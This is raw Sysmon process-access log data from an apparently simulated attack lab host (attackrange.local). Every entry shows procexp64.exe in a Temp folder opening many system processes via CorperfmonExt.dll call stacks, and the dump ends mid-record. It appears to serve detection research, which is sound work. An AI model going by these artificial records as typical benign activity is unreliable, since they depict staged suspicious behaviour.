15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786998Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786997Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786996Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786995Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786994Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786993Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786992Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786991Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786990Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786989Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786988Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786987Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786986Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786985Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786984Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786983Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786982Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786981Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786980Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786979Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786978Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786977Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786976Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786975Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 